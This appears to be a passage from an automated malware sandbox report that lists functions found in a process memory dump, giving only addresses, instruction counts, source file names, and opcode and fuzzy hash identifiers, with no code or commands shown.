                                                                                                                                                                                                                      • Instruction ID: 3b5e2396365fd1dff91dd4587dd84165f07395ade43791de87b1999d9e995254
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07F0E936B41D924BDB35EA2B8820B2EB2559FC0F20B15052CA545CB650DF10FC00B7A1
                                                                                                                                                                                                                      Function 00FCC89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0ce87aea62fda2506c28d8e5d7e88216ef6e0d8695a6efc0ab4cd6aa6b9add1d
                                                                                                                                                                                                                      • Instruction ID: 42d5359fb926c06b5b35d9d898698463b078e91ed28eca4bbb246fbc38222b47
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ce87aea62fda2506c28d8e5d7e88216ef6e0d8695a6efc0ab4cd6aa6b9add1d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DF0AF716053049FC310EF68C942E1BB7E4EF88714F40465EB898DB391EA38EA00D796
                                                                                                                                                                                                                      Function 00FCE872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                                                      • Instruction ID: 0dc24382e761f918e767eab0a9efa1786ac51564138cda6cd70ec6c6aef257b4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85F08933B515129BD3319A4DDD81F16B3A8EFC5B70F59006DBA049B2A0C764EC01E7D0
                                                                                                                                                                                                                      Function 00F70854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                                                      • Instruction ID: 6768066e19069e07669375188c85dee471afec3b5e514f21de3e4d21c401903f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAF0E9B2610204EFE714DF21CC01F56B3E9EF98350F14C0799949D72A0FAB4EE01E655
                                                                                                                                                                                                                      Function 00FCC912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 18d59087b643e38aa5468ae648c4c4cbe6403dbddc69b08a5cee90d359fcb51b
                                                                                                                                                                                                                      • Instruction ID: 66aa460c50aadc3632bf6d6ff8625728e758fd9c44f9ac2d33493ef4267f7f1e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18d59087b643e38aa5468ae648c4c4cbe6403dbddc69b08a5cee90d359fcb51b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2F04F70A012499FCB04EFA9C516F9EB7B4EF08304F108159B959EB395DA38EA01DB90
                                                                                                                                                                                                                      Function 00F447FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e4ca551f8e6aaf5647c94bffe9150af48fa7d4b4f65f5263520bb288c616ca60
                                                                                                                                                                                                                      • Instruction ID: 5eed83785d11bba93c6b6045a945efc1c5e7bef0694e32db2b1a12d808a37fd9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4ca551f8e6aaf5647c94bffe9150af48fa7d4b4f65f5263520bb288c616ca60
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2F0BE32D166E09FE732CB68C444B61BFD4AB10730F1C896ADD99A7912C775FC84E650
                                                                                                                                                                                                                      Function 01000115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: be9dbecd26c7b26fb2acca5439ab6cf06372aa9c89d36fe1b202e869b4767c07
                                                                                                                                                                                                                      • Instruction ID: 7608eccfd3959aeb3732b8ea5d3455bba49a74d7430702a3ea59b582bd34fc55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be9dbecd26c7b26fb2acca5439ab6cf06372aa9c89d36fe1b202e869b4767c07
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F02E3641968416DB735B2C78513D13BAD9B41264F0514C6E5E45714AC57E4543D310
                                                                                                                                                                                                                      Function 00F7C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: eb534a68aa83515fccfb2afa22b2edd58794500f2ebe780330d4e97ae4ab72bc
                                                                                                                                                                                                                      • Instruction ID: ab452782b3d0c8b7b4e921f799348b1dda7adb99a66f1ea6061a3ec0159954d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb534a68aa83515fccfb2afa22b2edd58794500f2ebe780330d4e97ae4ab72bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EF0E2729116509FC3229718C9C8B51B3D8AB00BB1F19D56FD80EC7512C364DC80EAD2
                                                                                                                                                                                                                      Function 00F82619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                                                                      • Instruction ID: 7899562212b6576a79f782ebd63abc07f54568d619d5115dc6cd96f793a4e81f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79E0D872300A402BD712AE59CCC1F97776EEFC2B10F040079B9045F252CAE6ED0997A4
                                                                                                                                                                                                                      Function 00FD6030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                                                                      • Instruction ID: a473ce246a2d13c852316ac421e75ed15129afc5cb4a9843909e896e9541ca12
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEF0E572100204DFE3208F05DC48F52B7E9EB05364F19C026E608CB660D339EC40EBA0
                                                                                                                                                                                                                      Function 00F40710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                                                                      • Instruction ID: 6e487877399bf0732bf2d15a7eecc1463c8b46538c9870aac2f825793f566dd0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDF0ED3A6043589BEB15DF1AC040AA97FA8EB41360B100094FE428B351EB35FE82EB81
                                                                                                                                                                                                                      Function 00F749D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                                                      • Instruction ID: e0b33b4b21a1cc2ec8626627714b0283171872d016b9ec1e48f3e41d801f1843
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20E09233694586ABE3211E558801B6A76A5DBD47A0F15842AE6088B160EB78EC40F799
                                                                                                                                                                                                                      Function 01014164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 481d5dc796b8b1a32d746794930177c04a978a62d5623d484057b65e3a9f8c77
                                                                                                                                                                                                                      • Instruction ID: 3c56eea8b30416f18e38776a1b1bb6e2d7c99cf93a6d33b465bc9a8553fc74c7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 481d5dc796b8b1a32d746794930177c04a978a62d5623d484057b65e3a9f8c77
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82F06531A265914FE7B2D72CE554B9577E4AB10734F5A09D4D489C792AC728EC80C650
                                                                                                                                                                                                                      Function 00FE678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                                                      • Instruction ID: 860c7e1a35e144185bd622e926d89c9b0840c6c4f1d2499faa19cbcb6042a4b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7E0DF32A00164BBDB22979A8D02F9ABAACDB94FA4F050065BA00E70D0D930EE00E690
                                                                                                                                                                                                                      Function 010108C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                                                      • Instruction ID: b889ab567bd2082ed13c8c444c11fe58cd43f9c5efbacfa871abd1d741e170bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9E09B316443518BCB258A2DC140A97B7E8EF95664F1580A9EDD54761AC275F882C6D0
                                                                                                                                                                                                                      Function 00FFA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                                                      • Instruction ID: d3e0d9a51234a71556d99a09b1772c181e088dfe80b3954a5db06fe2cbe2c989
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63E09231010610DFD732AF25DC09B62B7E0BF40721F148C2DB19A114B1C7B9ACC0EB41
                                                                                                                                                                                                                      Function 00F425E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 9d5283b5a2c0a1533858f506da41f783051babf35717d32c143b078882b45b49
                                                                                                                                                                                                                      • Instruction ID: b9e517f30840899c569274ecb8f755db1d8b106fff1edc3bad3f8985b4de4fed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d5283b5a2c0a1533858f506da41f783051babf35717d32c143b078882b45b49
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE09232100554ABC322BF29DD02F8B7BDAEF943A0F014525B55557191CB39B910E794
                                                                                                                                                                                                                      Function 00FC4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                                                      • Instruction ID: e60e891c43a16950eff74c514dde8373fda3f8f62b4356a456abe3b9bf69a516
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2E0C2347803068FD715CF19C151B627BB6BFD5B20F28C068A9488F205EB32E842DB40
                                                                                                                                                                                                                      Function 00F7CA38 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c72ac461ecf9778c204ef95d385df9894fc12bf01f1d99566e3855b2dfeb267f
                                                                                                                                                                                                                      • Instruction ID: 61ef119948bf8635aefc1cfba89a1239ccb275d223caede4021a12b7c761d6d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c72ac461ecf9778c204ef95d385df9894fc12bf01f1d99566e3855b2dfeb267f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FCD02B324814606ADB35E114BC25F933A5D9B41721F018866F60CD2010D55CCC81B3C4
                                                                                                                                                                                                                      Function 00F3823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                      • Instruction ID: 0c10339038aa1ba17730da8e3895ae77a041efb22559dd41f1164dac960771ac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03E08C32401A10EFDB312E25ED01B9277E1FB94BB0F214829F081170A58BBCAC82FB44
                                                                                                                                                                                                                      Function 00F42050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5f918282e6048e3bc13c8180626b1081b3fcb5e0e359d93ebc3714cce6c1f6b5
                                                                                                                                                                                                                      • Instruction ID: 7b9b44bd5640eabe99e76a8e472021982cc81f73e2eab97209f5a07131a66ec9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f918282e6048e3bc13c8180626b1081b3fcb5e0e359d93ebc3714cce6c1f6b5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79E0C2321004506BC312FF5DED02F4A779EEF943A0F010121F550972D1CB29BD00E7A4
                                                                                                                                                                                                                      Function 00F78A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                                                                      • Instruction ID: bb1ec40fd542c74a115937786c567d1c578100701a95fdf144e69d69b07af0d6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDE02633550A0497C328DE18C415B7277A4EF44730F08823FA51747380C934E804D795
                                                                                                                                                                                                                      Function 00F96AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                                                                      • Instruction ID: dc9a461533934258789e2e837e63efbfd6e23ee8517fa783ae843ef824328976
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84D05E36511A50AFC7329F1BEE04C13BBF9FBC5B61705062EA54593920C674AC06DBA0
                                                                                                                                                                                                                      Function 00F7E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                                                      • Instruction ID: 254aff47c84cadd37c321f3fd856d62a574691aed2d0f2ea5060ed510e05e752
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87D0A932A08620ABDB32AA1CFC04FC333E8AB88761F060459B208C7150C3A4AC81DA84
                                                                                                                                                                                                                      Function 00FBE908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                                                      • Instruction ID: a8764654c3e906f238bdff58d451ea91aeadff0370125fabcee59cd5fe1cde9d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70E0EC359506849BCF12EF59DA44F9AB7F5FB84B50F150054A4086B661C628AD04DB40
                                                                                                                                                                                                                      Function 00F3A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
